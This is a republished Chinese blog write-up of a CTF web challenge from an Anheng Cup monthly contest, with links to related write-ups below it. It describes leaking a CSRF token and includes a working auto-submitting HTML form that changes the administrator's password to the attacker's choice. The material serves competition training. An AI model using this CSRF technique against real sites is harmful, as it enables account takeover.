安恒杯2月月赛-应该不是xss

最新推荐文章于 2023-11-09 12:08:15 发布
最新推荐文章于 2023-11-09 12:08:15 发布
阅读量120 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/hell0w/p/8525054.html
版权

 

 

 

1. 打开题目一看,是个留言板

 

 2. 查看源码发现有几个js文件

依次打开发现在main.js里存在这样一段代码

3. 访问 /#login是登录的界面,/#chgpass是修改密码的界面,其中修改密码的时候不需要输入原密码,大概其是个csrf

4. 再查看app.js,是个修改密码的js,但是会先验证token,所以我们需要先得到token

获取token的方法原理:https://githubengineering.com/githubs-post-csp-journey/

5. 利用:

6. 监听得到token

 

7. 下一步就是构造链接,让管理员修改为我们想要的密码

在自己的服务器放置一个修改密码的页面,代码如下

<form action="http://192.168.5.94/api.php?action=chgpass" method="POST" name="chpa">
<input type="text" name="password" value="hell0_w" />
<input type="text" name="password2" value="hell0_w" />
<input type="text" name="token" value="ymYV0QvnvPbYGfUsmfmOI8Qz4wXaSQU6" />
</form>
<script>document.forms['chpa'].submit();</script>

 

收到请求

 

 

 使用我们修改的密码登录,就可以看到我们想要的flag了

 

 

转载于:https://www.cnblogs.com/hell0w/p/8525054.html

weixin_30666753
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
安恒明御WEB应用防火墙 report.php任意用户登录漏洞(含批量验证poc)
weixin_43567873的博客
04-06 210
安恒明御WEB应用防火墙 report.php任意用户登录漏洞(含批量验证poc)
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5516
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
第二届“强网杯”全国网络安全挑战WRITE-UP
郁离歌丶的博客
03-27 2578
周末打了一下QWB去看神仙打架23333333萌新我勉强苟进了前200,废话不多说了,还是太菜了。努力!WEBweb签到这个题有三层,过三关得flag。第一层param1[]=1&amp;param2[]=2第二层param1[]=1&amp;param2[]=2第三层使用MD5碰撞生日攻击参考链接:http://www.freebuf.com/articles/network/48015.htm...
安恒writeup 2018年12
SsMing的博客
12-23 1580
目录 misc1 misc2(签到) misc3 (学习资料) misc4(JUJU) web1 web2 pwn1 misc和web,和一道pwn misc1 看提示想到去下当时泄露的库 然后写脚本处理一下把数据库的内容,生成三个由用户名,密码,邮箱组成的字典,使用密码组成的字典爆开了压缩包 解压后得到个动图,记录上面的数字得到236855282761588523...
cumt12部分RE
WocW的博客
12-17 360
好像是第一次觉得自己在参加比... 1.RE-open the gate of RE 查看文件头是elf文件 使用IDA打开,查看字符串发现什么都没有 然后使用linux的edb打开动态调试。开头直接jmp到这个函数,F8执行完这个函数就显示了字符串 然后F7跟进这个函数 继续往下执行第二个syscall会卡住,然后直接跳过到执行下面的循环 阅读汇编得知这里...
安恒杯 writeup
Assassin
10-15 5605
总结说会的正题不难,不会的实在是难的可以…web1 iphone6直接将user-agent改成手机的就可以了,很简单不截图web2 jshunt这个题目我没有调出来来,但是明显就是xss,很困惑。 首先扫描了一下目录发现了tmp目录和up目录。up目录明显就是我们上传的jpg文件,有文件类型限制,但是没有 MIME检查,写入后是base64加密后的内容。而tmp内容更是直截了当,可以构造<ht
2018安恒三-WRITE-IP
郁离歌丶的博客
04-03 6808
打QWB去了,安恒没怎么看2333333333再次感谢榕榕给我的题目QAQ...CRYPTORSA拿到两个文件,一个flag.enc一个pub.key。最简单的rsa,直接秒了。事实是我也拿了一血。(居然把密码学的题放在re里面,猥琐2333333)从pub.key里面提取出n和e,具体可以看我之前写过的笔记《关于rsa的openssl命令一些随笔。》然后再把n放到http://factordb....
安恒6部分做题记录
0verWatch的博客
06-23 2909
前言 这次比恰逢别的学校考试,感觉题目有点水,但还是得记录一下 正文 Web1 Mynote 这道题目一开始我死扣xss发现无路可循后面经别人小小提醒之后,原来是个炒鸡弱智的反序列化题目,不多说 上图,在robots.txt里面发现几个可疑的页面,可能有用先记录着,直接访问flag.php是个假的flag。。 经过别人的提示,是反序列化以后,多抓几个包看一下 在uplo...
红队系列-溯源与应急反制专题
最新发布
aming小老弟
11-09 414
日志分析、流量特征分析、内存马。
1+x证书-网络安全
Chaoer
06-21 982
0.web攻击的几种方式 1、SQL注入攻击 2、xss攻击 3、文件上传漏洞 4、文件包含漏洞 1、web网页编程基础 HTML基本标签 CSS基本语法 JS的基本语法 PHP的基本语法 2、web攻击方式 1、SQL注入 SQL语句基础 -- 1、登录 mysql -u -root -p-- 2、查询数据库命令 show databases;-- 3、切换数据库 use-- 4、查看数据表 show tables;-- 5、查看表中的数据 select-- 6
安恒-2019年6-web
wyj_1216 House
07-02 3287
localview 题目 有个傲娇的管理员,只能从本地才能看到想要的~答案提交flag{}括号内的值。 writeup 根据题目提示 有两个注意点: 1、管理员 2、从本地 据此,我一开始进入了一条死路,直接在index.php的基础上,抓包,然后xff,实现欺骗,没有达到预期发现,于是考虑到管理员这一提示 正确解题过程: 首先先扫一下: 发现admin.php可访问, 于是访问后,发现: ...
安恒杯 1 re
皮三宝好菜的博客
01-27 729
安恒杯 1 俩到re方向的wp写下吧 来玩蛇 py打包题,标准操作一套就能带走。 类似的还有hxbctf的一道login 但hxb那到题目更加难些 首先cmd打开用py extractor分 吧文件夹放进linux里,搜索字符串。 因为一开始打开后会有tell me your name 直接搜索tell me就行 发现文件 为pyc文件添加上文件头,找个网站在线反编译一下 py反编译 #!/...
2018 6安恒杯
weixin_40423072的博客
09-03 1850
更一下比的 解析吧。安恒杯的 三题web,唔,平台关了所以,链接就 随缘了! 第一题 嗯,遇到就点吧,点击的时候页面不会跳转但是还是会有反应的,如果右键打开之后会有新的路径,后面有跟一个microsoft 的教程。那 这题就是一个 注入吧 但是常规注入并不能注入进去,无奈。Redis的注入也没有,于是看了解析之后我们就很自然的可以想到MongoDB注入,怎么说呢。只要想到他就能做出来,百度一...
安恒writeup 2019年2
SsMing的博客
02-24 2417
新年劝退,菜的真实,web一题不会,暴风流泪 MISC 玩游戏 下载附件后,得到一个exe和题目说明,运行exe后,发现题目分为三个关卡 第一关 看见是解盲文,有在线解盲文的网站,解密后为下面图中所示 看见这一串,数了位数后怀疑是一个字符串的md5值,百度之后发现是 hello 的MD5值,第一关通过 第二关 要提交两个MD5值相同的文件,使用工具fastcoll (...
CTF-安恒19年一部分writeup
weixin_34117211的博客
01-27 1717
CTF-安恒19年一部分writeup MISC1-赢战2019 是一道图片隐写题 linux下可以正常打开图片,首先到binwalk分析一下。 里面有东西,foremost分离一下 有一张二维码,扫一下看看 好吧 不是flag,继续分析图片,在winhex没有发现异常,那么上神器StegSolve分析一下 第一次翻了一遍图层没发现,眼瞎第二次才看见 ...
出题过程记录
heySister
01-20 527
记我第一次出题 出题思路 刚听说要试着出个题目的时候…emmm…心方方,不知道要出什么,觉得自己没什么想法,首先给自己定位,难肯定是难不到大佬们的,就是个锻炼过程,take easy 。 我就开始想啊,我这一个学期都看了些啥。 想到最开始ECShop 那个sql 注入利用链,很长一串,我感觉出不出来,利用都要那么长,我编那么长的代码应该很费劲吧…而且出这种大概是要把cms 源码搬上来吧? 之...
密码学 week2(XCTF新手练习区)
w
09-14 2003
1、base64 (1) Base64编码规则: 它将每3个字节(3个 字符)(24位)转换为4个字符。因为6位二进制数可以表示64个不同的数,因此只要确定了字符集(含64个字符),并为其中的每个字符确定一个唯一的编码,就可以通过映射将二进制字节转换为Base64编码。 通过每次切出3个字节,最后可能有以下几种情况 没有字节剩下---------->不需要其他操作 还剩下1个字节------...
有遗憾,有惊喜!
weixin_30877493的博客
01-23 69
昨晚,正在网上艰难的连上东方卫视,准备在线观看利物浦客场挑战曼联的比,突然朋友发来短信,说省体育台直播比,听了这个消息,十分惊喜,终于不用担心网络塞车而看不成比了。 比开始了,利物浦很久没有在客场穿上了白色的球衣,利物浦一直踢得很好,竟然在OldTraford控制了场面,让曼联非常被动,但并没有把优势化为胜势,下半场最后15分钟,可能因为体力原因,又可能想拿平...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值